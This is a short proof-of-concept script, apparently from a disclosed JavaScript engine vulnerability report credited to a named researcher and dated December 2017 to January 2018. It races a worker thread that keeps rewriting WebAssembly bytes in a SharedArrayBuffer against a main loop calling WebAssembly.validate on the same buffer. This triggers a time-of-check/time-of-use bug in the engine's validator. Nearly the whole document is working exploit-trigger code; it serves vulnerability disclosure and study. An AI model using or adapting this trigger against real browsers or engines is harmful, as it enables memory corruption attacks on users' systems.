- Report: Dec 2017
- Fix: Jan 2018
- Credit: Guang Gong of Alpha Team, Qihoo 360
var workerScript =
`onmessage = function(sab) {
var ta = new Uint8Array(sab);
var tmp;
while(1){
var index = (Math.random() * ta.length | 0) + 1;
var value = (Math.random() * 256 | 0) + 1;
//print(index + " " +value);
tmp=ta[index];
ta[index]=value;
for(var i=0;i<value;i++);
ta[index]=tmp;
}
};`;
/* 000054: 41 ff 0f | i32.const 2047
000057: 6a */
var w = new Worker(workerScript);
var b = readbuffer("./stack.wasm");
var ta = new Uint8Array(b);
var sb = new SharedArrayBuffer(b.byteLength);
var sta = new Uint8Array(sb);
for(var i=0;i<ta.length;i++)
sta[i]=ta[i];
// Transfer SharedArrayBuffer
w.postMessage(sb);
while(1){
try{
var result= WebAssembly.validate(sta);
}catch(e){print(e)}
}